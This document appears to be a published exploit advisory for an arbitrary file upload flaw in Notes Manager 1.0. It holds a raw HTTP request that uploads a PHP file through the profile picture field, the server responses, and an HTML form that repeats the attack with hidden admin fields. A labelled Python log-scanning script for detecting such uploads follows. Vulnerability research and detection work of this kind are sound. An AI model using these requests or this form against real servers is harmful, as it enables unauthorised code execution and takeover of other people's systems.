
Notes Manager 1.0 Shell Upload

Posted Oct 31, 2018
Authored by Ihsan Sencan

Notes Manager version 1.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
MD5 | 2c1e7646664db47fa555768925253c58

# Exploit Title: Notes Manager 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.webprojectbuilder.com/item/notes-management
# Software Link: https://astuteinternet.dl.sourceforge.net/project/notes-manager/notes_management.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=453324a77afd51a1fd2618b57d3dfd6c880da056
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------95839047417419306891039500038
Content-Length: 737
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="fileOld"
g_1540845821.php
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="users_id"
1
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="user_type"
admin
-----------------------------95839047417419306891039500038
Content-Disposition: form-data; name="submit1"
-----------------------------95839047417419306891039500038--

HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 21:10:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ci_session=00cf0a180900e0b110b84343140d8f1c77a68493; expires=Mon, 29-Oct-2018 23:10:19 GMT; Max-Age=7200; path=/; HttpOnly
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

GET /[PATH]/assets/images/phpinfo_1540847419.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=upb6pa4qn0h16clnht4ugvhee1; ci_session=00cf0a180900e0b110b84343140d8f1c77a68493
Connection: keep-alive

HTTP/1.1 200 OK
Date: Mon, 29 Oct 2018 21:10:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit">Ver Ayari</button>
</form>
</body>
</html>
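
Detection sketch for the exchange above, added here as an example and not part of the original advisory: it scans web-server access logs for script files requested from the image upload directory and ties each hit to a preceding POST to user/add_edit from the same client. The log lines, the /notes prefix standing in for [PATH], the client addresses and the function names are constructed for illustration; the stored-name check relies on what the capture shows, namely that the Unix timestamp in phpinfo_1540847419.php equals the upload response's Date header.

```python
import re
from datetime import datetime, timezone

# Constructed sample (Apache combined format); /notes stands in for [PATH], IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Oct/2018:21:10:19 +0000] "POST /notes/user/add_edit HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Oct/2018:21:10:42 +0000] "GET /notes/assets/images/phpinfo_1540847419.php HTTP/1.1" 200 90412 "-" "Mozilla/5.0"
203.0.113.20 - - [29/Oct/2018:21:11:05 +0000] "GET /notes/assets/images/avatar_1540840000.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.20 - - [29/Oct/2018:21:12:30 +0000] "POST /notes/user/add_edit HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD = re.compile(r'/user/add_edit/?$')
# Server-side script extensions that should never be served from an image directory.
SCRIPT = re.compile(r'/assets/images/[^/?]+\.(?:php\d?|phtml|phar)(?:$|[/?])', re.I)
# Stored names in the capture look like <name>_<unix time>.<ext>.
STAMP = re.compile(r'_(\d{10})\.[^./?]+')

def parse(log):
    """Yield (client, time, method, path, status) for each well-formed line."""
    for raw in log.splitlines():
        m = LINE.match(raw)
        if m:
            ip, ts, method, path, status = m.groups()
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            yield ip, when, method, path, int(status)

def find_uploaded_scripts(log, window=3600):
    """Flag script requests under assets/images and correlate with earlier uploads."""
    uploads, findings = {}, []   # uploads: client IP -> times of POSTs to add_edit
    for ip, when, method, path, status in parse(log):
        if method == "POST" and UPLOAD.search(path.split("?")[0]):
            uploads.setdefault(ip, []).append(when)
        elif SCRIPT.search(path):
            stamp = STAMP.search(path)
            stored = datetime.fromtimestamp(int(stamp.group(1)), timezone.utc) if stamp else None
            prior = [u for u in uploads.get(ip, []) if 0 <= (when - u).total_seconds() <= window]
            findings.append({
                "client": ip, "path": path,
                "served": status == 200,          # 200 means the file exists and was handled
                "upload_seen": bool(prior),       # same client posted to add_edit shortly before
                "name_matches_upload": any(
                    stored and abs((stored - u).total_seconds()) <= 2 for u in prior),
            })
    return findings

if __name__ == "__main__":
    for finding in find_uploaded_scripts(SAMPLE_LOG):
        print(finding)
```

A hit with served set is worth triage on its own; upload_seen and name_matches_upload only raise confidence that the file arrived through the profile picture field.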


